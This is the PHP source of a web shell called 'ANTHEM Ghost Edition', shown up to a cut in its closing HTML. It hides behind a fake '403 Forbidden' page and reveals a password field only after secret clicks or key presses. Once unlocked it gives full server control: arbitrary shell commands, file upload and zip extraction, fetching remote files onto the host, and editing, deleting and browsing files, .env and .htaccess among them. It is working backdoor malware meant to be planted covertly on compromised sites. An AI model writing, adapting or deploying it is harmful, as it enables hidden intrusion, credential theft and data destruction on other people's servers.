<?php
// ============================================================
// ANTHEM PROJECT - Ghost Edition v2.0
// Password: $2y$12$t2julyJXtJBZkXQWQwWgI.jpjHi.gHDIqx.ko0w5bgN2.MkL3JcGS
// ============================================================

$password_hash = '$2y$12$t2julyJXtJBZkXQWQwWgI.jpjHi.gHDIqx.ko0w5bgN2.MkL3JcGS';

@ini_set('display_errors', '0');
@error_reporting(0);
@set_time_limit(0);
@ini_set('memory_limit', '512M');
@ini_set('post_max_size', '500M');
@ini_set('upload_max_filesize', '500M');
@ignore_user_abort(true);
@ob_end_clean();

$session_name = 'ant_' . md5(__FILE__);
@session_name($session_name);
if (!isset($_SESSION) && function_exists('session_status') && session_status() === PHP_SESSION_NONE) {
    @session_start();
} elseif (!isset($_SESSION)) {
    @session_start();
}

function getCurrentDir() {
    static $dir = null;
    if ($dir === null) {
        $dir = isset($_GET['d']) ? $_GET['d'] : @getcwd();
        if (!@is_dir($dir)) $dir = dirname(__FILE__);
    }
    return $dir;
}

function formatSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB'];
    $i = 0;
    while ($bytes >= 1024 && $i < 3) { $bytes /= 1024; $i++; }
    return round($bytes, 2) . ' ' . $units[$i];
}

function cleanName($name) {
    $name = str_replace(['../', '..\\', './'], '', $name);
    $name = preg_replace('/[^\w\-\.]/', '_', $name);
    return trim($name, '_');
}

function executeCmd($cmd, $cwd) {
    $output = '';
    $fullCmd = 'cd "' . $cwd . '" && ' . $cmd . ' 2>&1';
    
    if (function_exists('shell_exec')) {
        $output = @shell_exec($fullCmd);
    } elseif (function_exists('exec')) {
        $out = []; @exec($fullCmd, $out, $code);
        $output = implode("\n", $out);
        if ($code !== 0) $output .= "\n[!] Exit code: " . $code;
    } elseif (function_exists('system')) {
        ob_start(); @system($fullCmd, $code); $output = ob_get_clean();
        if ($code !== 0) $output .= "\n[!] Exit code: " . $code;
    } else {
        $output = '[!] No shell_exec/exec/system available';
    }
    
    return $output;
}

function downloadFile($url, $path) {
    $content = @file_get_contents($url);
    if ($content === false && function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $content = curl_exec($ch);
        curl_close($ch);
    }
    if ($content && file_put_contents($path, $content)) {
        @chmod($path, 0644);
        return true;
    }
    return false;
}

// ==================== AUTENTIKASI ====================
$auth = false;
if (isset($_SESSION['ant_auth']) && $_SESSION['ant_auth'] === true) {
    $auth = true;
} elseif (isset($_POST['p'])) {
    $pass = $_POST['p'];
    $verified = false;
    
    if (function_exists('password_verify')) {
        $verified = @password_verify($pass, $password_hash);
    }
    
    if (!$verified) {
        $verified = ($pass === $password_hash);
    }
    
    if ($verified) {
        $_SESSION['ant_auth'] = true;
        $auth = true;
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    }
}

// ==================== HALAMAN 403 GELAP MATI ====================
if (!$auth) {
    $showLogin = isset($_GET['p']) && $_GET['p'] == '1';
    
    if (!$showLogin) {
        header('HTTP/1.0 403 Forbidden');
        echo '<!DOCTYPE html>
        <html>
        <head>
            <meta charset="utf-8">
            <title>403 Forbidden</title>
            <style>
                * { margin:0; padding:0; }
                body { 
                    background: #0a0a0a;
                    color: #1a1a1a;
                    font-family: Arial, Helvetica, sans-serif;
                    height: 100vh;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                }
                .center {
                    text-align: center;
                    padding: 40px;
                    max-width: 500px;
                }
                h1 { 
                    font-size: 120px; 
                    font-weight: 300; 
                    color: #1a1a1a;
                    letter-spacing: -5px;
                    margin: 0;
                }
                h2 { 
                    font-size: 18px; 
                    font-weight: 300; 
                    color: #1a1a1a;
                    margin-top: 5px;
                    letter-spacing: 3px;
                }
                p { 
                    font-size: 12px; 
                    color: #151515;
                    margin-top: 15px;
                    letter-spacing: 1px;
                }
                .pass-area {
                    position: fixed;
                    bottom: 30px;
                    right: 30px;
                    opacity: 0;
                    transition: opacity 0.3s;
                }
                .pass-area input {
                    background: #0a0a0a;
                    border: none;
                    color: #1a1a1a;
                    font-size: 11px;
                    padding: 4px 8px;
                    width: 1px;
                    outline: none;
                    font-family: monospace;
                    letter-spacing: 2px;
                }
                .pass-area input:focus {
                    width: 200px;
                    border-bottom: 1px solid #1a1a1a;
                    color: #2a2a2a;
                }
                .pass-area input::placeholder {
                    color: #111;
                }
                footer {
                    position: fixed;
                    bottom: 10px;
                    left: 0;
                    width: 100%;
                    text-align: center;
                    color: #111;
                    font-size: 9px;
                    font-family: monospace;
                    letter-spacing: 2px;
                }
            </style>
        </head>
        <body>
            <div class="center">
                <h1>403</h1>
                <h2>Forbidden</h2>
                <p>You don\'t have permission to access this resource.</p>
            </div>
            <div class="pass-area">
                <form method="post">
                    <input type="password" name="p" id="p" placeholder=" " autocomplete="off">
                </form>
            </div>
            <footer></footer>
            <script>
                var input = document.getElementById("p");
                var area = document.querySelector(".pass-area");
                
                // Triple click on 403
                document.querySelector("h1").addEventListener("click", function(e) {
                    if (e.detail === 3) {
                        area.style.opacity = "1";
                        input.style.width = "200px";
                        input.style.borderBottom = "1px solid #1a1a1a";
                        input.style.color = "#2a2a2a";
                        input.focus();
                        setTimeout(function() {
                            input.style.width = "1px";
                            input.style.borderBottom = "none";
                            input.style.color = "#1a1a1a";
                            area.style.opacity = "0";
                        }, 8000);
                    }
                });
                
                // ESC + TAB
                var escPressed = false;
                document.addEventListener("keydown", function(e) {
                    if (e.key === "Escape") {
                        escPressed = true;
                        setTimeout(function() { escPressed = false; }, 3000);
                    }
                    if (e.key === "Tab" && escPressed) {
                        e.preventDefault();
                        area.style.opacity = "1";
                        input.style.width = "200px";
                        input.style.borderBottom = "1px solid #2a2a2a";
                        input.style.color = "#3a3a3a";
                        input.focus();
                    }
                    if (e.key === "Enter" && document.activeElement === input) {
                        input.form.submit();
                    }
                });
                
                // Double click on center
                document.querySelector(".center").addEventListener("dblclick", function() {
                    area.style.opacity = "1";
                    input.style.width = "200px";
                    input.style.borderBottom = "1px solid #2a2a2a";
                    input.style.color = "#3a3a3a";
                    input.focus();
                    setTimeout(function() {
                        input.style.width = "1px";
                        input.style.borderBottom = "none";
                        input.style.color = "#1a1a1a";
                        area.style.opacity = "0";
                    }, 8000);
                });
            </script>
        </body>
        </html>';
        exit;
    } else {
        // Login via ?p=1
        echo '<!DOCTYPE html>
        <html>
        <head>
            <meta charset="UTF-8">
            <title>ANTHEM</title>
            <style>
                * { margin:0; padding:0; box-sizing:border-box; }
                body {
                    background: #0a0a0a;
                    min-height: 100vh;
                    display: flex;
                    align-items: center;
                    justify-content: center;
                    padding: 20px;
                    font-family: monospace;
                }
                .box {
                    background: #0f0f0f;
                    border: 1px solid #1a1a1a;
                    border-radius: 4px;
                    padding: 40px 30px;
                    width: 100%;
                    max-width: 320px;
                }
                .box h1 {
                    color: #1a3a1a;
                    font-size: 16px;
                    letter-spacing: 4px;
                    text-align: center;
                    font-weight: 300;
                }
                .box .sub {
                    color: #0a0a0a;
                    font-size: 9px;
                    text-align: center;
                    letter-spacing: 3px;
                    margin-top: 3px;
                }
                .input-group { margin-top: 20px; }
                .input-group input {
                    width: 100%;
                    padding: 10px 14px;
                    background: #050505;
                    border: 1px solid #151515;
                    border-radius: 3px;
                    color: #1a3a1a;
                    font-size: 12px;
                    font-family: monospace;
                    outline: none;
                    transition: 0.3s;
                    text-align: center;
                    letter-spacing: 1px;
                }
                .input-group input:focus {
                    border-color: #1a3a1a;
                }
                .input-group input::placeholder { color: #0a0a0a; }
                .btn {
                    width: 100%;
                    padding: 10px;
                    background: #0a0a0a;
                    border: 1px solid #151515;
                    border-radius: 3px;
                    color: #1a3a1a;
                    font-size: 12px;
                    cursor: pointer;
                    transition: 0.3s;
                    font-family: monospace;
                    letter-spacing: 2px;
                    margin-top: 12px;
                }
                .btn:hover {
                    border-color: #1a3a1a;
                    background: #050505;
                }
                .footer { 
                    text-align: center; 
                    margin-top: 15px; 
                    color: #080808; 
                    font-size: 8px; 
                    letter-spacing: 2px; 
                }
            </style>
        </head>
        <body>
            <div class="box">
                <h1>✦ ANTHEM ✦</h1>
                <div class="sub">private access</div>
                <form method="post">
                    <div class="input-group">
                        <input type="password" name="p" placeholder="code" required autofocus>
                    </div>
                    <button type="submit" class="btn">unlock</button>
                </form>
                <div class="footer">v2.0</div>
            </div>
            <script>
                document.querySelector("input").focus();
                document.addEventListener("keydown", function(e) {
                    if (e.key === "Escape") window.location.href = "?";
                });
            </script>
        </body>
        </html>';
        exit;
    }
}

// ==================== MAIN SHELL ====================
$dir = isset($_GET['d']) ? $_GET['d'] : getCurrentDir();
if (!@is_dir($dir)) $dir = getCurrentDir();
if ($dir !== '/' && substr($dir, -1) !== '/') $dir .= '/';

$messages = isset($_SESSION['msgs']) ? $_SESSION['msgs'] : [];
$cmdOutput = isset($_SESSION['cmdOut']) ? $_SESSION['cmdOut'] : '';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // ZIP UPLOAD + EXTRACT
    if (!empty($_FILES['zip_file']) && $_FILES['zip_file']['error'] === UPLOAD_ERR_OK) {
        $zipTmp = $_FILES['zip_file']['tmp_name'];
        $zipName = cleanName(basename($_FILES['zip_file']['name']));
        $zipPath = $dir . $zipName;
        if (@move_uploaded_file($zipTmp, $zipPath)) {
            @chmod($zipPath, 0644);
            $extracted = false;
            if (class_exists('ZipArchive')) {
                $zip = new ZipArchive();
                if ($zip->open($zipPath) === true) {
                    if ($zip->extractTo($dir)) {
                        $extracted = true;
                        $messages[] = "📦 Extracted: " . $zipName;
                    }
                    $zip->close();
                }
            }
            if (!$extracted && function_exists('shell_exec')) {
                $cmd = 'cd "' . $dir . '" && unzip -o "' . $zipPath . '" 2>&1';
                $output = @shell_exec($cmd);
                if ($output && (strpos($output, 'inflating') !== false || strpos($output, 'extracting') !== false)) {
                    $extracted = true;
                    $messages[] = "📦 Extracted via CLI: " . $zipName;
                }
            }
            if (!$extracted) {
                $messages[] = "❌ Failed to extract: " . $zipName;
            }
        } else {
            $messages[] = "❌ Failed to upload zip: " . $zipName;
        }
    }
    
    // FILE UPLOAD
    if (!empty($_FILES['file'])) {
        foreach ($_FILES['file']['name'] as $k => $name) {
            if ($_FILES['file']['error'][$k] === UPLOAD_ERR_OK) {
                $target = $dir . cleanName(basename($name));
                if (@move_uploaded_file($_FILES['file']['tmp_name'][$k], $target)) {
                    @chmod($target, 0644);
                    $messages[] = "✅ Uploaded: " . basename($name);
                }
            }
        }
    }
    
    // DOWNLOAD URL
    if (isset($_POST['download_url']) && !empty($_POST['url'])) {
        $url = trim($_POST['url']);
        $filename = !empty($_POST['filename']) ? cleanName($_POST['filename']) : basename(parse_url($url, PHP_URL_PATH));
        if (empty($filename)) $filename = 'file_' . time() . '.bin';
        $target = $dir . $filename;
        if (downloadFile($url, $target)) {
            $messages[] = "✅ Downloaded: " . $filename;
        } else {
            $messages[] = "❌ Failed to download: " . $url;
        }
    }
    
    // COMMAND
    if (isset($_POST['cmd']) && trim($_POST['cmd'])) {
        $cmdOutput = executeCmd($_POST['cmd'], $dir);
    }
    
    // CREATE
    if (isset($_POST['create'])) {
        $name = cleanName($_POST['name']);
        if ($name) {
            if ($_POST['type'] === 'folder') {
                if (@mkdir($dir . $name, 0755, true)) $messages[] = "📁 Created folder: " . $name;
                else $messages[] = "❌ Failed to create folder: " . $name;
            } else {
                if (@file_put_contents($dir . $name, $_POST['content'])) {
                    @chmod($dir . $name, 0644);
                    $messages[] = "📄 Created file: " . $name;
                } else {
                    $messages[] = "❌ Failed to create file: " . $name;
                }
            }
        }
    }
    
    // DELETE SELECTED
    if (isset($_POST['delete_selected']) && !empty($_POST['items'])) {
        $count = 0;
        $items = explode('|||', $_POST['items']);
        foreach ($items as $item) {
            $target = $dir . basename($item);
            if (@is_dir($target)) {
                executeCmd("rm -rf " . escapeshellarg($target), $dir);
                $count++;
            } elseif (@file_exists($target)) {
                @unlink($target);
                $count++;
            }
        }
        $messages[] = "🗑 Deleted " . $count . " items";
    }
    
    // RENAME
    if (isset($_POST['rename'])) {
        $old = $dir . basename($_POST['old_name']);
        $new = $dir . cleanName($_POST['new_name']);
        if (@file_exists($old) && !@file_exists($new) && @rename($old, $new)) {
            $messages[] = "✏️ Renamed: " . $_POST['old_name'] . " → " . $_POST['new_name'];
        } else {
            $messages[] = "❌ Rename failed";
        }
    }
    
    $_SESSION['msgs'] = $messages;
    $_SESSION['cmdOut'] = $cmdOutput;
    
    header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
    exit;
}

if (isset($_GET['delete'])) {
    $target = $dir . basename($_GET['delete']);
    if (@is_dir($target)) {
        executeCmd("rm -rf " . escapeshellarg($target), $dir);
        $messages[] = "🗑 Deleted folder: " . basename($_GET['delete']);
    } elseif (@file_exists($target)) {
        @unlink($target);
        $messages[] = "🗑 Deleted file: " . basename($_GET['delete']);
    }
    $_SESSION['msgs'] = $messages;
    header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
    exit;
}

if (isset($_GET['edit'])) {
    $editFile = basename($_GET['edit']);
    $editContent = @file_get_contents($dir . $editFile);
    if ($editContent === false) {
        $messages[] = "❌ Cannot read file";
        $_SESSION['msgs'] = $messages;
        header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
        exit;
    }
}

if (isset($_GET['save_edit']) && isset($_POST['content']) && isset($_POST['file'])) {
    $file = $dir . basename($_POST['file']);
    if (@file_put_contents($file, $_POST['content'])) {
        $messages[] = "💾 Saved: " . basename($_POST['file']);
    } else {
        $messages[] = "❌ Failed to save";
    }
    $_SESSION['msgs'] = $messages;
    header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
    exit;
}

if (isset($_GET['extract'])) {
    $zipPath = $dir . basename($_GET['extract']);
    if (@file_exists($zipPath) && pathinfo($zipPath, PATHINFO_EXTENSION) === 'zip') {
        $extracted = false;
        if (class_exists('ZipArchive')) {
            $zip = new ZipArchive();
            if ($zip->open($zipPath) === true) {
                if ($zip->extractTo($dir)) {
                    $extracted = true;
                    $messages[] = "📦 Extracted: " . basename($_GET['extract']);
                }
                $zip->close();
            }
        }
        if (!$extracted && function_exists('shell_exec')) {
            $cmd = 'cd "' . $dir . '" && unzip -o "' . $zipPath . '" 2>&1';
            $output = @shell_exec($cmd);
            if ($output && (strpos($output, 'inflating') !== false || strpos($output, 'extracting') !== false)) {
                $extracted = true;
                $messages[] = "📦 Extracted via CLI: " . basename($_GET['extract']);
            }
        }
        if (!$extracted) {
            $messages[] = "❌ Failed to extract: " . basename($_GET['extract']);
        }
    }
    $_SESSION['msgs'] = $messages;
    header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
    exit;
}

if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

if (isset($_GET['clear_msgs'])) {
    unset($_SESSION['msgs']);
    header("Location: " . $_SERVER['PHP_SELF'] . "?d=" . urlencode($dir));
    exit;
}

if (isset($_SESSION['msgs'])) {
    $messages = $_SESSION['msgs'];
    unset($_SESSION['msgs']);
}
if (isset($_SESSION['cmdOut'])) {
    $cmdOutput = $_SESSION['cmdOut'];
    unset($_SESSION['cmdOut']);
}
?>

<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ANTHEM</title>
    <link href="https://fonts.googleapis.com/css2?family=Exo+2:wght@300;400;600&display=swap" rel="stylesheet">
    <style>
        * { margin:0; padding:0; box-sizing:border-box; }
        body {
            font-family: 'Exo 2', sans-serif;
            background: #0a0a0a;
            color: #1a3a1a;
            min-height: 100vh;
        }
        .container { max-width: 1400px; margin: 0 auto; padding: 20px; }
        
        .header {
            background: #0f0f0f;
            border: 1px solid #1a1a1a;
            border-radius: 12px;
            padding: 20px 25px;
            margin-bottom: 25px;
        }
        .header-top {
            display: flex;
            justify-content: space-between;
            align-items: center;
            flex-wrap: wrap;
            gap: 15px;
        }
        .header h1 {
            font-size: 18px;
            font-weight: 300;
            color: #1a3a1a;
            letter-spacing: 4px;
        }
        .header h1 small {
            font-size: 10px;
            letter-spacing: 3px;
            opacity: 0.3;
            color: #1a3a1a;
        }
        .status-bar {
            display: flex;
            gap: 20px;
            flex-wrap: wrap;
            font-size: 11px;
            color: #1a2a1a;
            font-family: monospace;
        }
        .nav-path {
            background: #0a0a0a;
            padding: 10px 16px;
            border-radius: 6px;
            margin-top: 12px;
            font-family: monospace;
            font-size: 13px;
            border-left: 2px solid #1a3a1a;
            word-break: break-all;
            color: #1a2a1a;
        }
        .nav-path a {
            color: #1a3a1a;
            text-decoration: none;
            transition: 0.3s;
        }
        .nav-path a:hover { color: #2a5a2a; }
        
        .btn-group {
            display: flex;
            flex-wrap: wrap;
            gap: 8px;
            margin-top: 12px;
        }
        .btn {
            padding: 8px 18px;
            border-radius: 6px;
            border: 1px solid #1a1a1a;
            background: #0a0a0a;
            color: #1a3a1a;
            font-family: 'Exo 2', sans-serif;
            font-size: 12px;
            font-weight: 400;
            cursor: pointer;
            transition: all 0.3s;
            text-decoration: none;
            display: inline-flex;
            align-items: center;
            gap: 6px;
        }
        .btn:hover {
            border-color: #1a3a1a;
            background: #0f0f0f;
        }
        .btn-danger { color: #3a1a1a; border-color: #2a1a1a; }
        .btn-danger:hover { border-color: #4a1a1a; }
        .btn-success { color: #1a3a1a; border-color: #1a2a1a; }
        .btn-success:hover { border-color: #2a4a2a; }
        
        .grid-3 {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(260px, 1fr));
            gap: 20px;
            margin-bottom: 25px;
        }
        .card {
            background: #0f0f0f;
            border: 1px solid #1a1a1a;
            border-radius: 12px;
            padding: 20px;
            transition: 0.3s;
        }
        .card:hover { border-color: #1a3a1a; }
        .card h3 {
            color: #1a3a1a;
            font-size: 12px;
            font-weight: 400;
            letter-spacing: 2px;
            margin-bottom: 15px;
        }
        .card input, .card select, .card textarea {
            width: 100%;
            padding: 10px 14px;
            background: #0a0a0a;
            border: 1px solid #1a1a1a;
            border-radius: 6px;
            color: #1a3a1a;
            font-size: 13px;
            font-family: 'Exo 2', sans-serif;
            margin-bottom: 10px;
            transition: 0.3s;
        }
        .card input:focus, .card select:focus, .card textarea:focus {
            outline: none;
            border-color: #1a3a1a;
        }
        .card textarea { height: 70px; resize: vertical; }
        .card small { color: #1a1a1a; font-size: 10px; display: block; margin-bottom: 8px; }
        
        .table-wrap {
            background: #0f0f0f;
            border: 1px solid #1a1a1a;
            border-radius: 12px;
            overflow: hidden;
            margin-bottom: 25px;
        }
        .table-wrap table { width: 100%; border-collapse: collapse; }
        .table-wrap th {
            background: #0a0a0a;
            padding: 12px 16px;
            text-align: left;
            font-size: 10px;
            letter-spacing: 1px;
            color: #1a3a1a;
            border-bottom: 1px solid #1a1a1a;
            font-weight: 400;
        }
        .table-wrap td {
            padding: 10px 16px;
            border-bottom: 1px solid #0a0a0a;
            font-size: 13px;
            color: #1a2a1a;
        }
        .table-wrap tr:hover { background: #0a0a0a; }
        .file-name {
            color: #1a3a1a;
            text-decoration: none;
            padding: 3px 8px;
            border-radius: 4px;
            transition: 0.3s;
            display: inline-flex;
            align-items: center;
            gap: 6px;
        }
        .file-name:hover { background: #0a0a0a; }
        .file-folder { color: #1a4a1a; }
        .file-hidden { opacity: 0.3; }
        .actions { display: flex; flex-wrap: wrap; gap: 4px; }
        .actions .btn { padding: 3px 10px; font-size: 10px; border-radius: 4px; }
        
        .terminal-box {
            background: #0f0f0f;
            border: 1px solid #1a1a1a;
            border-radius: 12px;
            padding: 20px;
            margin-top: 25px;
        }
        .terminal-box h3 {
            color: #1a3a1a;
            font-size: 12px;
            font-weight: 400;
            letter-spacing: 2px;
            margin-bottom: 12px;
        }
        .terminal-output {
            background: #0a0a0a;
            padding: 16px;
            border-radius: 6px;
            font-family: monospace;
            font-size: 12px;
            white-space: pre-wrap;
            max-height: 300px;
            overflow-y: auto;
            color: #1a3a1a;
            line-height: 1.6;
            border: 1px solid #1a1a1a;
        }
        
        .modal {
            display: none;
            position: fixed;
            top: 0; left: 0; width: 100%; height: 100%;
            background: rgba(0,0,0,0.8);
            z-index: 999;
            align-items: center;
            justify-content: center;
        }
        .modal.show { display: flex; }
        .modal-box {
            background: #0f0f0f;
            border: 1px solid #1a1a1a;
            border-radius: 12px;
            padding: 30px;
            max-width: 450px;
            width: 90%;
        }
        .modal-box h3 { color: #1a3a1a; font-size: 14px; font-weight: 400; letter-spacing: 2px; margin-bottom: 18px; }
        .modal-box input, .modal-box select {
            width: 100%;
            padding: 10px 14px;
            background: #0a0a0a;
            border: 1px solid #1a1a1a;
            border-radius: 6px;
            color: #1a3a1a;
            font-size: 13px;
            margin-bottom: 10px;
        }
        .modal-box input:focus { outline: none; border-color: #1a3a1a; }
        .modal-actions { display: flex; gap: 10px; margin-top: 12px; }
        .modal-actions .btn { flex: 1; text-align: center; justify-content: center; }
        
        .messages { margin-bottom: 20px; }
        .msg {
            padding: 10px 16px;
            border-radius: 6px;
            background: #0a0a0a;
            border-left: 2px solid #1a3a1a;
            margin-bottom: 6px;
            animation: fadeMsg 4s forwards;
            font-size: 13px;
            color: #1a3a1a;
        }
        @keyframes fadeMsg {
            0%, 70% { opacity: 1; }
            100% { opacity: 0; display: none; }
        }
        
        ::-webkit-scrollbar { width: 4px; }
        ::-webkit-scrollbar-track { background: #0a0a0a; }
        ::-webkit-scrollbar-thumb { background: #1a3a1a; border-radius: 2px; }
        
        @media (max-width: 768px) {
            .container { padding: 10px; }
            .header { padding: 15px; }
            .grid-3 { grid-template-columns: 1fr; }
            .table-wrap { overflow-x: auto; }
            .table-wrap th, .table-wrap td { padding: 8px 10px; font-size: 11px; }
            .btn { padding: 6px 12px; font-size: 11px; }
        }
    </style>
</head>
<body>
<div class="container">
    
    <div class="header">
        <div class="header-top">
            <h1>✦ ANTHEM <small>project</small></h1>
            <div class="status-bar">
                <span>⚡</span>
                <span>📁 <?php echo substr(sprintf('%o', @fileperms($dir)), -4); ?></span>
                <span>💾 <?php echo round(disk_free_space($dir)/1024/1024/1024, 2); ?>GB</span>
                <span>🕐 <?php echo date('H:i:s'); ?></span>
            </div>
        </div>
        
        <div class="nav-path">
            <?php
            $parts = explode('/', trim($dir, '/'));
            $current = '';
            echo '<a href="?d=/">/</a>';
            foreach ($parts as $p) {
                if ($p) {
                    $current .= '/' . $p;
                    echo '/<a href="?d=' . urlencode($current) . '">' . htmlspecialchars($p) . '</a>';
                }
            }
            ?>
        </div>
        
        <div class="btn-group">
            <a href="?d=<?php echo urlencode(dirname($dir)); ?>" class="btn">← back</a>
            <a href="?d=<?php echo urlencode(getCurrentDir()); ?>" class="btn">⌂ home</a>
            <button class="btn" onclick="showModal('modalCreate')">+ create</button>
            <button class="btn btn-danger" onclick="deleteSelected()">✕ delete</button>
            <a href="?clear_msgs=1" class="btn">clear</a>
            <a href="?logout=1" class="btn btn-danger">exit</a>
        </div>
    </div>
    
    <?php if (!empty($messages)): ?>
    <div class="messages">
        <?php foreach ($messages as $msg): ?>
            <div class="msg"><?php echo htmlspecialchars($msg); ?></div>
        <?php endforeach; ?>
    </div>
    <?php endif; ?>
    
    <div class="grid-3">
        <div class="card">
            <h3>upload</h3>
            <form method="post" enctype="multipart/form-data">
                <input type="file" name="file[]" multiple required>
                <button type="submit" class="btn" style="width:100%; justify-content:center;">↑ upload</button>
            </form>
        </div>
        
        <div class="card">
            <h3>zip extract</h3>
            <form method="post" enctype="multipart/form-data">
                <input type="file" name="zip_file" accept=".zip" required>
                <button type="submit" class="btn btn-success" style="width:100%; justify-content:center;">📦 extract</button>
            </form>
        </div>
        
        <div class="card">
            <h3>download url</h3>
            <form method="post">
                <input type="url" name="url" placeholder="https://example.com/file.zip" required>
                <input type="text" name="filename" placeholder="save as (optional)">
                <input type="hidden" name="download_url" value="1">
                <button type="submit" class="btn btn-success" style="width:100%; justify-content:center;">↓ download</button>
            </form>
        </div>
    </div>
    
    <div class="table-wrap">
        <table>
            <thead>
                <tr>
                    <th style="width:30px;"><input type="checkbox" id="selectAll"></th>
                    <th>name</th>
                    <th>size</th>
                    <th>perm</th>
                    <th>modified</th>
                    <th>actions</th>
                </tr>
            </thead>
            <tbody>
                <?php
                $items = @scandir($dir);
                if ($items) {
                    $folders = []; $files = [];
                    foreach ($items as $item) {
                        if ($item == '.' || $item == '..') continue;
                        if (@is_dir($dir . $item)) $folders[] = $item;
                        else $files[] = $item;
                    }
                    sort($folders); sort($files);
                    $allItems = array_merge($folders, $files);
                    
                    foreach ($allItems as $item) {
                        $path = $dir . $item;
                        $isDir = @is_dir($path);
                        $isHidden = substr($item, 0, 1) === '.';
                        $size = $isDir ? '-' : formatSize(@filesize($path));
                        $perm = substr(sprintf('%o', @fileperms($path)), -4);
                        $modified = date('Y-m-d H:i', @filemtime($path));
                        $urlFile = (isset($_SERVER['HTTPS']) ? 'https://' : 'http://') . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $path);
                        $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION));
                        $icon = '📄';
                        if ($isDir) $icon = '📁';
                        elseif (in_array($ext, ['php','php5','phtml'])) $icon = '🐘';
                        elseif (in_array($ext, ['jpg','jpeg','png','gif','webp'])) $icon = '🖼️';
                        elseif (in_array($ext, ['zip','rar','tar','gz'])) $icon = '📦';
                        elseif (in_array($ext, ['txt','log','md'])) $icon = '📝';
                        elseif ($ext == 'html' || $ext == 'htm') $icon = '🌐';
                        elseif ($ext == 'htaccess') $icon = '🔒';
                        elseif ($ext == 'env') $icon = '🔐';
                        ?>
                        <tr>
                            <td><input type="checkbox" name="items[]" value="<?php echo htmlspecialchars($item); ?>"></td>
                            <td>
                                <?php if ($isDir): ?>
                                    <a href="?d=<?php echo urlencode($path); ?>" class="file-name file-folder">
                                        <?php echo $icon; ?> <?php echo $isHidden ? '▪ ' : ''; ?><?php echo htmlspecialchars($item); ?>
                                    </a>
                                <?php elseif (in_array($ext, ['php','txt','log','md','html','htm','css','js','json','xml','htaccess','env'])): ?>
                                    <a href="?d=<?php echo urlencode($dir); ?>&edit=<?php echo urlencode($item); ?>" class="file-name">
                                        <?php echo $icon; ?> <?php echo $isHidden ? '▪ ' : ''; ?><?php echo htmlspecialchars($item); ?>
                                    </a>
                                <?php else: ?>
                                    <span class="file-name">
                                        <?php echo $icon; ?> <?php echo $isHidden ? '▪ ' : ''; ?><?php echo htmlspecialchars($item); ?>
                                    </span>
                                <?php endif; ?>
                            </td>
                            <td><?php echo $size; ?></td>
                            <td><?php echo $perm; ?></td>
                            <td><?php echo $modified; ?></td>
                            <td>
                                <div class="actions">
                                    <a href="<?php echo $urlFile; ?>" target="_blank" class="btn">📂</a>
                                    <?php if (!$isDir): ?>
                                        <a href="?d=<?php echo urlencode($dir); ?>&edit=<?php echo urlencode($item); ?>" class="btn">✎</a>
                                    <?php endif; ?>
                                    <?php if ($ext == 'zip'): ?>
                                        <a href="?d=<?php echo urlencode($dir); ?>&extract=<?php echo urlencode($item); ?>" class="btn btn-success">📦</a>
                                    <?php endif; ?>
                                    <a href="#" onclick="renameItem('<?php echo htmlspecialchars(addslashes($item)); ?>')" class="btn">✏</a>
                                    <a href="?d=<?php echo urlencode($dir); ?>&delete=<?php echo urlencode($item); ?>" class="btn btn-danger" onclick="return confirm('Delete?')">✕</a>
                                </div>
                            </td>
                        </tr>
                        <?php
                    }
                }
                ?>
            </tbody>
        </table>
        <form method="post" id="deleteForm">
            <input type="hidden" name="items" id="deleteItems">
            <input type="hidden" name="delete_selected" value="1">
        </form>
    </div>
    
    <?php if (isset($editFile)): ?>
    <div class="card" style="margin-bottom:25px;">
        <h3>✎ editing: <?php echo htmlspecialchars($editFile); ?></h3>
        <form method="post" action="?d=<?php echo urlencode($dir); ?>&save_edit=1">
            <input type="hidden" name="file" value="<?php echo htmlspecialchars($editFile); ?>">
            <textarea name="content" style="width:100%;height:350px;background:#0a0a0a;border:1px solid #1a1a1a;border-radius:6px;color:#1a3a1a;font-family:monospace;font-size:13px;padding:14px;resize:vertical;"><?php echo htmlspecialchars($editContent); ?></textarea>
            <div style="display:flex;gap:10px;margin-top:12px;">
                <button type="submit" class="btn btn-success">💾 save</button>
                <a href="?d=<?php echo urlencode($dir); ?>" class="btn">cancel</a>
            </div>
        </form>
    </div>
    <?php endif; ?>
    
    <div class="terminal-box">
        <h3>terminal</h3>
        <form method="post">
            <div style="display:flex;gap:8px;flex-wrap:wrap;">
                <input type="text" name="cmd" placeholder="$ " style="flex:1;padding:10px 14px;background:#0a0a0a;border:1px solid #1a1a1a;border-radius:6px;color:#1a3a1a;font-size:13px;font-family:monospace;">
                <button type="submit" class="btn">▶ run</button>
            </div>
        </form>
        <?php if (!empty($cmdOutput)): ?>
        <div class="terminal-output">
            <?php echo htmlspecialchars($cmdOutput); ?>
        </div>
        <?php endif; ?>
    </div>
    
    <div class="modal" id="modalCreate">
        <div class="modal-box">
            <h3>+ create</h3>
            <form method="post">
                <input type="text" name="name" placeholder="name" required>
                <select name="type">
                    <option value="file">📄 file</option>
                    <option value="folder">📁 folder</option>
                </select>
                <textarea name="content" placeholder="content (for file)" rows="4"></textarea>
                <input type="hidden" name="create" value="1">
                <div class="modal-actions">
                    <button type="submit" class="btn btn-success">create</button>
                    <button type="button" class="btn" onclick="hideModal('modalCreate')">cancel</button>
                </div>
            </form>
        </div>
    </div>
    
